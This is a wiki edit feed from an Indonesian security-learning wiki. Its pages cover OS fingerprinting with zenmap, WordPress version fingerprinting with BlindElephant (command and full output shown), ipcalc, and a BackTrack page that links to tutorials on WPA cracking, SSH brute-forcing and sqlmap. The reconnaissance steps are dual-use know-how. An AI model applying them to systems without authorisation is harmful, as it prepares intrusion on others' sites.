&lt;br /&gt;
&lt;br /&gt;
==Pranala Luar==&lt;br /&gt;
 http://adinugroho.web.id/tutorial/windows/daftar-software-yang-biasa-dibajak.html&lt;br /&gt;
 http://www.amazon.com&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Oice_although_after_you%27ve_read_this_herpes_dating&amp;diff=28513</id>
		<title>Oice although after you&#039;ve read this herpes dating</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Oice_although_after_you%27ve_read_this_herpes_dating&amp;diff=28513"/>
		<updated>2011-11-20T06:21:38Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: Removing all content from page&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=OS_Fingerprinting_Menggunakan_zenmap&amp;diff=27265</id>
		<title>OS Fingerprinting Menggunakan zenmap</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=OS_Fingerprinting_Menggunakan_zenmap&amp;diff=27265"/>
		<updated>2011-07-17T07:17:47Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Cara Penggunaan zenmap untuk OS Fingerprinting */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;Zenmap&#039;&#039;&#039; adalah versi GUI dari nmap. Kegunaannya sama dengan nmap versi console tetapi zenmap lebih mudah digunakan karena tidak perlu menghafal options yang ada di nmap.&lt;br /&gt;
==Cara Penggunaan zenmap untuk OS Fingerprinting==&lt;br /&gt;
Sebagai contoh, range IP Address yang akan discan adalah 192.168.56.0/24. Anda tinggal mengetikkan 192.168.56.0.24 pada kotak input &#039;&#039;target&#039;&#039; lalu tekan scan. OS yang dipakai akan terlihat pada tab &#039;&#039;Host Details&#039;&#039;.&lt;br /&gt;
&lt;br /&gt;
[[Image:zenmap.png]]&lt;br /&gt;
&lt;br /&gt;
Dari gambar diatas terlihat bahwa OS yang digunakan adalah Linux dengan perkiraan kernel yang dipakai adalah 2.6.19 - 2.6.36&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Backtrack]]&lt;br /&gt;
[[Category:Security]][[Category:Backtrack]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=CMS_Identification_Menggunakan_blindelephant&amp;diff=27264</id>
		<title>CMS Identification Menggunakan blindelephant</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=CMS_Identification_Menggunakan_blindelephant&amp;diff=27264"/>
		<updated>2011-07-17T06:55:40Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Cara Penggunaan */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;blindelephant adalah aplikasi yang berfungsi untuk mengetahui versi dari sebuah web application.&lt;br /&gt;
==Web Application Yang Didukung==&lt;br /&gt;
Saat ini web application yang didukung adalah:&lt;br /&gt;
* confluence with 0 plugins&lt;br /&gt;
* drupal with 16 plugins&lt;br /&gt;
*  - admin_menu&lt;br /&gt;
*  - cck&lt;br /&gt;
*  - date&lt;br /&gt;
*  - filefield&lt;br /&gt;
*  - google_analytics&lt;br /&gt;
*  - imageapi&lt;br /&gt;
*  - imagecache&lt;br /&gt;
*  - imagefield&lt;br /&gt;
*  - imce&lt;br /&gt;
*  - imce_swfupload&lt;br /&gt;
*  - pathauto&lt;br /&gt;
*  - print&lt;br /&gt;
*  - spamicide&lt;br /&gt;
*  - tagadelic&lt;br /&gt;
*  - token&lt;br /&gt;
*  - views&lt;br /&gt;
* joomla with 0 plugins&lt;br /&gt;
* liferay with 0 plugins&lt;br /&gt;
* mediawiki with 0 plugins&lt;br /&gt;
* moodle with 0 plugins&lt;br /&gt;
* movabletype with 0 plugins&lt;br /&gt;
* oscommerce with 0 plugins&lt;br /&gt;
* phpbb with 0 plugins&lt;br /&gt;
* phpmyadmin with 0 plugins&lt;br /&gt;
* phpnuke with 0 plugins&lt;br /&gt;
* spip with 0 plugins&lt;br /&gt;
* tikiwiki with 0 plugins&lt;br /&gt;
* twiki with 0 plugins&lt;br /&gt;
* wordpress with 26 plugins&lt;br /&gt;
*  - add-to-any&lt;br /&gt;
*  - advertising-manager&lt;br /&gt;
*  - akismet&lt;br /&gt;
*  - all-in-one-seo-pack&lt;br /&gt;
*  - buddypress&lt;br /&gt;
*  - contact-form-7&lt;br /&gt;
*  - gd-star-rating&lt;br /&gt;
*  - google-analyticator&lt;br /&gt;
*  - google-sitemap-generator&lt;br /&gt;
*  - newsletter&lt;br /&gt;
*  - nextgen-gallery&lt;br /&gt;
*  - polldaddy&lt;br /&gt;
*  - simple-tags&lt;br /&gt;
*  - smart-youtube&lt;br /&gt;
*  - sociable&lt;br /&gt;
*  - stats&lt;br /&gt;
*  - subscribe2&lt;br /&gt;
*  - tinymce-advanced&lt;br /&gt;
*  - twitter-tools&lt;br /&gt;
*  - wp-e-commerce&lt;br /&gt;
*  - wp-pagenavi&lt;br /&gt;
*  - wp-spamfree&lt;br /&gt;
*  - wp-super-cache&lt;br /&gt;
*  - wp-useronline&lt;br /&gt;
*  - wptouch&lt;br /&gt;
*  - yet-another-related-posts-plugin&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Cara Penggunaan==&lt;br /&gt;
 python BlindElephant.py http://bt.foo.org/books wordpress&lt;br /&gt;
 Loaded /pentest/web/blindelephant/src/blindelephant/dbs/wordpress.pkl with 213 versions, 5214 differentiating paths, and 300 version groups.&lt;br /&gt;
 Starting BlindElephant fingerprint for version of wordpress at http://bt.foo.org/books &lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/readme.html&lt;br /&gt;
 File produced no match. Error: Retrieved file doesn&#039;t match known fingerprint. 11fda7bdaec3851353224a08826e46f2 &lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/tiny_mce.js&lt;br /&gt;
 File produced no match. Error: Retrieved file doesn&#039;t match known fingerprint. 9f861e2b752c1a4d5fc691f3e3195b0a &lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/autosave.js&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/about.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/source_editor.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/link.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin.js&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/swfupload/handlers.js&lt;br /&gt;
 File produced no match. Error: Retrieved file doesn&#039;t match known fingerprint. 447a01d08e7047781453c9b37d1af384 &lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/image.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/color_picker.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/anchor.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/charmap.htm&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-content/plugins/akismet/readme.txt&lt;br /&gt;
 File produced no match. Error: Retrieved file doesn&#039;t match known fingerprint. 397219dc64f0489ed3e3e9e597ad2db8 &lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/themes/advanced/editor_template.js&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 Hit http://bt.foo.org/books/wp-includes/js/tinymce/plugins/wordpress/editor_plugin.js&lt;br /&gt;
 Possible versions based on result: 3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-RC1, 3.1-RC2, 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Fingerprinting resulted in:&lt;br /&gt;
 3.1-beta1&lt;br /&gt;
 3.1-beta1-IIS&lt;br /&gt;
 3.1-beta2&lt;br /&gt;
 3.1-beta2-IIS&lt;br /&gt;
 3.1-RC1&lt;br /&gt;
 3.1-RC2&lt;br /&gt;
 3.1-RC2-IIS&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Best Guess: 3.1-RC2-IIS&lt;br /&gt;
Dari output dapat diketahui bahwa kemungkinan terbesar website tersebut menggunakan wordpress versi 3.1-RC2-IIS&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Backtrack]]&lt;br /&gt;
[[Category:Backtrack]][[Category:CMS Identification]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Backtrack&amp;diff=27263</id>
		<title>Backtrack</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Backtrack&amp;diff=27263"/>
		<updated>2011-07-17T06:53:53Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Salah satu distro [[linux]] yang awalnya merupakan turunan dari [[slackware]]. Backtrack merupakan merger dari [[whax]] dan [[auditor security collection]]. Sekarang ini [[Backtrack]] berbasis [[Debian]]. Backtrack menjadi tool yang sangat baik bagi mereka yang ingin belajar teknik hacking dan [[keamanan jaringan]]. [[Backtrack]] dapat di ambil secara bebas dari&lt;br /&gt;
&lt;br /&gt;
 &#039;&#039;&#039;http://www.backtrack-linux.org/downloads/&#039;&#039;&#039;&lt;br /&gt;
 http://opensource.telkomspeedy.com/repo/backtrack&lt;br /&gt;
 http://belajar.internetsehat.org/iso/backtrack-5.0&lt;br /&gt;
 http://bebasupload.com/users/yusuf/3261/indobacktrack.or.id BackTrack 5 dr IndoBackTrack&lt;br /&gt;
 http://repo.antihackerlink.or.id/download.php?list.88&lt;br /&gt;
 http://iso.ukdw.ac.id/backtrack5/&lt;br /&gt;
 http://pandawa.ipb.ac.id/iso/backtrack/bt5/ &lt;br /&gt;
&lt;br /&gt;
Backtrack dua dirilis pada tanggal 6 maret 2007 yang memasukkan lebih dari 300 tool security sedangkan versi beta 3 dari backtrack dirilis pada tanggal 14 desember 2007 yang pada rilis ketiga ini lebih difokuskan untuk support [[hardware]]. Sedangkan versi backtrack 3 dirilis pada tanggal 19 juni 2008 pada backtrack versi 3 ini memasukkan [[saint]] dan [[maltego]] sedangkan [[nessus]] tidak dimasukkan serta tetap memakai kernel versi 2.6.21.5. pada BackTrack 4 Final sekarang ini menawarkan [[kernel]] [[linux]] terbaru yaitu kernel 2.6.30.4 .Dilengkapi juga dengan patch untuk wireless driver untuk menanggulangi serangan [[wireless injection]] ([[wireless injection attacks]]) &lt;br /&gt;
&lt;br /&gt;
== Sejarah backtrack ==&lt;br /&gt;
&lt;br /&gt;
Backtrack dibuat oleh Mati Aharoni yang merupakan konsultan security dari Israel dan max mosser jadi merupakan kolaborasi komunitas, backtrack sendiri merupakan merger dari [[whax]] yang mana [[whax]] ini adalah salah satu distro [[linux]] yang digunakan untuk test keamanan yang asal dari [[whax]] sendiri dari [[knoppix]]. Ketika [[knoppix]] mencapi versi 3.0 maka dinamakan dengan [[whax]]. Dengan [[whax]] kita bisa melakukan test securtity dari berbagai jaringan dimana saja .&lt;br /&gt;
&lt;br /&gt;
Max mosser merupakan auditor security collection yang menghususkan dirinya untuk melakukan penetrasi keamanan di [[linux]], gabungan dari auditor dan whax ini sendiri menghasilakan 300 tool yang digunakan untuk testing security jaringan. Auditor security collection juga terdapat pada knoppix.&lt;br /&gt;
&lt;br /&gt;
== Fitur Backtrack ==&lt;br /&gt;
Fitur dari backtrack :&lt;br /&gt;
Diantara beberapa tool yang terdapat dalam backtrack :&lt;br /&gt;
&lt;br /&gt;
• Metasploit integration&lt;br /&gt;
• RFMON wireless drivers&lt;br /&gt;
• [[Kismet]]&lt;br /&gt;
• AutoScan-Network - AutoScan-Network is a network discovering and managing application&lt;br /&gt;
• [[Nmap]]&lt;br /&gt;
• [[Ettercap]]&lt;br /&gt;
• [[Wireshark]] (dulu di kenal sebagai [[Ethereal]])&lt;br /&gt;
&lt;br /&gt;
• Enumeration&lt;br /&gt;
• Exploit Archives&lt;br /&gt;
• [[Scanners]]&lt;br /&gt;
• Password Attacks&lt;br /&gt;
• Fuzzers&lt;br /&gt;
• [[Spoofing]]&lt;br /&gt;
• [[Sniffers]]&lt;br /&gt;
• Tunneling&lt;br /&gt;
• [[Wireless]] Tools&lt;br /&gt;
• [[Bluetooth]]&lt;br /&gt;
• Cisco Tools&lt;br /&gt;
• Database Tools&lt;br /&gt;
• Forensic Tools&lt;br /&gt;
• BackTrack Services&lt;br /&gt;
• Reversing&lt;br /&gt;
• Misc&lt;br /&gt;
&lt;br /&gt;
Tapi disamping tool jaringan backtrack memasukkan [[mozilla]], [[pidgin]], [[k3b]], [[xmms]] dll.&lt;br /&gt;
&lt;br /&gt;
==Rilis Backtrack==&lt;br /&gt;
&lt;br /&gt;
 26-05-2006 rilis backtrack pertama kali yang merupakan versi non beta 1.0&lt;br /&gt;
 13-10-2006 backtrack 2 beta pertama untuk publik di rilis&lt;br /&gt;
 19-11-2006 backtrack 2 beta kedua untuk publik di rilis&lt;br /&gt;
 06-03-2007 backtrack 2 final dirilis&lt;br /&gt;
 17-12-2007 backtrack 3 beta pertama dirilis &lt;br /&gt;
 19-03-2008 backtrack 3 final dirilis&lt;br /&gt;
 11-02-2009 Backtrack 4 first beta release ([[Backtrack]] sekarang berbasis [[Debian]])&lt;br /&gt;
 19-06-2009 BackTrack 4 pre-final release.&lt;br /&gt;
 09-01-2010 BackTrack 4 final release.&lt;br /&gt;
 05-08-2010 Backtrack 4 R1 release&lt;br /&gt;
 10-05-2011 BackTrack 5 Released&lt;br /&gt;
&lt;br /&gt;
==Instalasi==&lt;br /&gt;
* [[Backtrack: Daftar Repository]]&lt;br /&gt;
* [[Backtrack: Membuat Repository Backtrack menggunakan debmirror]]&lt;br /&gt;
* [[Backtrack: Membuat Repository Backtrack menggunakan wget]] - lebih mudah&lt;br /&gt;
* [[Backtrack: Install di Harddisk]]&lt;br /&gt;
* [[Backtrack: Instalsi LiveUSB]]&lt;br /&gt;
* http://www.zimbio.com/Ubuntu+Linux/articles/e1_qHsbCMfz/Install+Backtrack+Applications+Ubuntu&lt;br /&gt;
* [[Backtrack: Install Aplikasi Backtrack di Ubuntu]]&lt;br /&gt;
&lt;br /&gt;
===Ubuntu Pentest Edition===&lt;br /&gt;
&lt;br /&gt;
* http://www.ubuntugeek.com/ubuntu-pentest-edition-for-penetration-testing.html&lt;br /&gt;
* http://www.netinfinity.org/tools/&lt;br /&gt;
* http://www.netinfinity.org/download/&lt;br /&gt;
&lt;br /&gt;
==Konfigurasi Backtrack==&lt;br /&gt;
* [[Backtrack: Mengaktifkan Interface]]&lt;br /&gt;
* [[Backtrack: Mengkonfigurasi IP address]]&lt;br /&gt;
* [[Backtrack: Menyambungkan ke Wireless HotSpot]]&lt;br /&gt;
* [[Backtrack:_Upgrade_Ke_Versi_Terbaru]]&lt;br /&gt;
* http://indobacktrack.or.id/2009/05/backtrack-4-tanpa-lilo&lt;br /&gt;
* http://indobacktrack.or.id/2009/04/konfiguras-ip-di-backtrack-3/&lt;br /&gt;
* http://www.backtrack-linux.org/tutorials/customize-backtrack/&lt;br /&gt;
* http://www.offensive-security.com/backtrack/customising-backtrack-live-cd-the-easy-way/&lt;br /&gt;
* [[Backtrack: Menyambungkan modem ZTE AC2726i]]&lt;br /&gt;
* [[dnsset]] Konfigurasi [[DNS]] Otomatis&lt;br /&gt;
&lt;br /&gt;
==Enumeration==&lt;br /&gt;
* [[Cari Subdomain Dengan dnsmap]]&lt;br /&gt;
* [[Backtrack: DMitry]] Deepmagic Information Gathering Tool&lt;br /&gt;
* [[CMS Identification Menggunakan whatweb]]&lt;br /&gt;
* [[CMS Identification Menggunakan blindelephant]]&lt;br /&gt;
&lt;br /&gt;
==Wireless Hacking==&lt;br /&gt;
* [[Wireless Hacking]]&lt;br /&gt;
* [[Kismet | Backtrack: Kismet Scanning Frekuensi]]&lt;br /&gt;
* [[Backtrack: Tutorial cracking WPA PSK]]&lt;br /&gt;
* http://indobacktrack.or.id/2009/06/hacking-wifi-di-backtrack-3/&lt;br /&gt;
* http://indobacktrack.or.id/2009/09/cracking-wpawpa2-psk-gpu-dengan-pyrit-pre-build-packages-bawaan-backtrack/&lt;br /&gt;
* http://code.google.com/p/pyrit/&lt;br /&gt;
* [[Tutorial agak lengkap tentang Wireless Hacking WEP dan WPA]]&lt;br /&gt;
&lt;br /&gt;
==Hacking==&lt;br /&gt;
* [[Instalasi Web Scarab Vulnerabilities Scanner]]&lt;br /&gt;
* http://indobacktrack.or.id/2010/05/instalasi-web-scarab-vulnerabilities-scanner/&lt;br /&gt;
* [[Backtrack: Cracking Password Windows]]&lt;br /&gt;
* [[Backtrack: sslstrip - hacking https]]&lt;br /&gt;
* http://sectools.org/web-scanners.html&lt;br /&gt;
* [[Backtrack: Kumpulan Wordlist]]&lt;br /&gt;
* [[Backtrack: Menjebol SSH secara BruteForce]]&lt;br /&gt;
* [[Backtrack: sqlmap untuk menjebol dynamic web]]&lt;br /&gt;
* [[Backtrack: mysqlaudit untuk audit MySQL]]&lt;br /&gt;
* [[nmap: scanning sebuah mesin]]&lt;br /&gt;
* http://ezine.echo.or.id/ezine8/ez-r08-zylon-johntheripper.txt&lt;br /&gt;
* [[Melihat struktur folder web server]]&lt;br /&gt;
* [[OS Fingerprinting Menggunakan zenmap]]&lt;br /&gt;
&lt;br /&gt;
===Hacking Video===&lt;br /&gt;
&lt;br /&gt;
* http://www.fileserve.com/file/bA44ghM&lt;br /&gt;
* http://www.fileserve.com/file/KEwD6ub&lt;br /&gt;
* http://www.fileserve.com/file/xYPWeWY&lt;br /&gt;
* http://www.fileserve.com/file/7PbFvWj&lt;br /&gt;
* http://www.fileserve.com/file/MWBMqeU&lt;br /&gt;
* http://www.fileserve.com/file/VDPfSER&lt;br /&gt;
* http://www.fileserve.com/file/gGxPUWH&lt;br /&gt;
* http://www.fileserve.com/file/kdKmTfx&lt;br /&gt;
&lt;br /&gt;
==Lain-lain==&lt;br /&gt;
* [[Cara Menggunakan ipcalc]]&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
&lt;br /&gt;
* http://id-backtrack.com&lt;br /&gt;
* http://indobacktrack.or.id/&lt;br /&gt;
* http://www.backtrack-linux.org&lt;br /&gt;
* http://www.backtrack-linux.org/downloads/&lt;br /&gt;
* http://www.backtrack-linux.org/tutorials/backtrack-forensics/&lt;br /&gt;
* http://www.backtrack-linux.org/bt/wireless-drivers/&lt;br /&gt;
* http://www.offensive-security.com/backtrack/penetration-testing-information-security-distribution/&lt;br /&gt;
* http://www.ilmuhacking.com/&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
&lt;br /&gt;
* [[Backtrack]]&lt;br /&gt;
* [[GnackTrack]]&lt;br /&gt;
* [[Ubuntu Pentest Edition]]&lt;br /&gt;
* [[Samurai Pentest]]&lt;br /&gt;
* [[Beberapa Tip Hacking]]&lt;br /&gt;
* [[Wireless Hacking]]&lt;br /&gt;
* [[Keamanan Jaringan]]&lt;br /&gt;
&lt;br /&gt;
[[Category: hacking]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=File:Ipcalc.png&amp;diff=27262</id>
		<title>File:Ipcalc.png</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=File:Ipcalc.png&amp;diff=27262"/>
		<updated>2011-07-17T06:52:09Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Cara_Menggunakan_ipcalc&amp;diff=27261</id>
		<title>Cara Menggunakan ipcalc</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Cara_Menggunakan_ipcalc&amp;diff=27261"/>
		<updated>2011-07-17T06:51:36Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: &amp;#039;&amp;#039;&amp;#039;ipcalc&amp;#039;&amp;#039;&amp;#039; adalah sebuah IP Address Calculator yang berguna untuk mengetahui netmask IP, network IP, Broadcast IP dan beberapa informasi lainnya. ==Cara Menggunakan ipcalc== contoh:  roo...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;ipcalc&#039;&#039;&#039; adalah sebuah IP Address Calculator yang berguna untuk mengetahui netmask IP, network IP, Broadcast IP dan beberapa informasi lainnya.&lt;br /&gt;
==Cara Menggunakan ipcalc==&lt;br /&gt;
contoh:&lt;br /&gt;
 root@batik:~# ipcalc 192.168.0.1/24&lt;br /&gt;
 Address:   192.168.0.1          11000000.10101000.00000000. 00000001&lt;br /&gt;
 Netmask:   255.255.255.0 = 24   11111111.11111111.11111111. 00000000&lt;br /&gt;
 Wildcard:  0.0.0.255            00000000.00000000.00000000. 11111111&lt;br /&gt;
 =&amp;gt;&lt;br /&gt;
 Network:   192.168.0.0/24       11000000.10101000.00000000. 00000000&lt;br /&gt;
 HostMin:   192.168.0.1          11000000.10101000.00000000. 00000001&lt;br /&gt;
 HostMax:   192.168.0.254        11000000.10101000.00000000. 11111110&lt;br /&gt;
 Broadcast: 192.168.0.255        11000000.10101000.00000000. 11111111&lt;br /&gt;
 Hosts/Net: 254                   Class C, Private Internet&lt;br /&gt;
&lt;br /&gt;
[[Image:Ipcalc.png]]&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Backtrack]]&lt;br /&gt;
[[Category:Security]][[Category:Networking]][[Category:Backtrack]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Backtrack&amp;diff=27260</id>
		<title>Backtrack</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Backtrack&amp;diff=27260"/>
		<updated>2011-07-17T06:50:16Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Enumeration */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Salah satu distro [[linux]] yang awalnya merupakan turunan dari [[slackware]]. Backtrack merupakan merger dari [[whax]] dan [[auditor security collection]]. Sekarang ini [[Backtrack]] berbasis [[Debian]]. Backtrack menjadi tool yang sangat baik bagi mereka yang ingin belajar teknik hacking dan [[keamanan jaringan]]. [[Backtrack]] dapat di ambil secara bebas dari&lt;br /&gt;
&lt;br /&gt;
 &#039;&#039;&#039;http://www.backtrack-linux.org/downloads/&#039;&#039;&#039;&lt;br /&gt;
 http://opensource.telkomspeedy.com/repo/backtrack&lt;br /&gt;
 http://belajar.internetsehat.org/iso/backtrack-5.0&lt;br /&gt;
 http://bebasupload.com/users/yusuf/3261/indobacktrack.or.id BackTrack 5 dr IndoBackTrack&lt;br /&gt;
 http://repo.antihackerlink.or.id/download.php?list.88&lt;br /&gt;
 http://iso.ukdw.ac.id/backtrack5/&lt;br /&gt;
 http://pandawa.ipb.ac.id/iso/backtrack/bt5/ &lt;br /&gt;
&lt;br /&gt;
Backtrack dua dirilis pada tanggal 6 maret 2007 yang memasukkan lebih dari 300 tool security sedangkan versi beta 3 dari backtrack dirilis pada tanggal 14 desember 2007 yang pada rilis ketiga ini lebih difokuskan untuk support [[hardware]]. Sedangkan versi backtrack 3 dirilis pada tanggal 19 juni 2008 pada backtrack versi 3 ini memasukkan [[saint]] dan [[maltego]] sedangkan [[nessus]] tidak dimasukkan serta tetap memakai kernel versi 2.6.21.5. pada BackTrack 4 Final sekarang ini menawarkan [[kernel]] [[linux]] terbaru yaitu kernel 2.6.30.4 .Dilengkapi juga dengan patch untuk wireless driver untuk menanggulangi serangan [[wireless injection]] ([[wireless injection attacks]]) &lt;br /&gt;
&lt;br /&gt;
== Sejarah backtrack ==&lt;br /&gt;
&lt;br /&gt;
Backtrack dibuat oleh Mati Aharoni yang merupakan konsultan security dari Israel dan max mosser jadi merupakan kolaborasi komunitas, backtrack sendiri merupakan merger dari [[whax]] yang mana [[whax]] ini adalah salah satu distro [[linux]] yang digunakan untuk test keamanan yang asal dari [[whax]] sendiri dari [[knoppix]]. Ketika [[knoppix]] mencapi versi 3.0 maka dinamakan dengan [[whax]]. Dengan [[whax]] kita bisa melakukan test securtity dari berbagai jaringan dimana saja .&lt;br /&gt;
&lt;br /&gt;
Max mosser merupakan auditor security collection yang menghususkan dirinya untuk melakukan penetrasi keamanan di [[linux]], gabungan dari auditor dan whax ini sendiri menghasilakan 300 tool yang digunakan untuk testing security jaringan. Auditor security collection juga terdapat pada knoppix.&lt;br /&gt;
&lt;br /&gt;
== Fitur Backtrack ==&lt;br /&gt;
Fitur dari backtrack :&lt;br /&gt;
Diantara beberapa tool yang terdapat dalam backtrack :&lt;br /&gt;
&lt;br /&gt;
• Metasploit integration&lt;br /&gt;
• RFMON wireless drivers&lt;br /&gt;
• [[Kismet]]&lt;br /&gt;
• AutoScan-Network - AutoScan-Network is a network discovering and managing application&lt;br /&gt;
• [[Nmap]]&lt;br /&gt;
• [[Ettercap]]&lt;br /&gt;
• [[Wireshark]] (dulu di kenal sebagai [[Ethereal]])&lt;br /&gt;
&lt;br /&gt;
• Enumeration&lt;br /&gt;
• Exploit Archives&lt;br /&gt;
• [[Scanners]]&lt;br /&gt;
• Password Attacks&lt;br /&gt;
• Fuzzers&lt;br /&gt;
• [[Spoofing]]&lt;br /&gt;
• [[Sniffers]]&lt;br /&gt;
• Tunneling&lt;br /&gt;
• [[Wireless]] Tools&lt;br /&gt;
• [[Bluetooth]]&lt;br /&gt;
• Cisco Tools&lt;br /&gt;
• Database Tools&lt;br /&gt;
• Forensic Tools&lt;br /&gt;
• BackTrack Services&lt;br /&gt;
• Reversing&lt;br /&gt;
• Misc&lt;br /&gt;
&lt;br /&gt;
Tapi disamping tool jaringan backtrack memasukkan [[mozilla]], [[pidgin]], [[k3b]], [[xmms]] dll.&lt;br /&gt;
&lt;br /&gt;
==Rilis Backtrack==&lt;br /&gt;
&lt;br /&gt;
 26-05-2006 rilis backtrack pertama kali yang merupakan versi non beta 1.0&lt;br /&gt;
 13-10-2006 backtrack 2 beta pertama untuk publik di rilis&lt;br /&gt;
 19-11-2006 backtrack 2 beta kedua untuk publik di rilis&lt;br /&gt;
 06-03-2007 backtrack 2 final dirilis&lt;br /&gt;
 17-12-2007 backtrack 3 beta pertama dirilis &lt;br /&gt;
 19-03-2008 backtrack 3 final dirilis&lt;br /&gt;
 11-02-2009 Backtrack 4 first beta release ([[Backtrack]] sekarang berbasis [[Debian]])&lt;br /&gt;
 19-06-2009 BackTrack 4 pre-final release.&lt;br /&gt;
 09-01-2010 BackTrack 4 final release.&lt;br /&gt;
 05-08-2010 Backtrack 4 R1 release&lt;br /&gt;
 10-05-2011 BackTrack 5 Released&lt;br /&gt;
&lt;br /&gt;
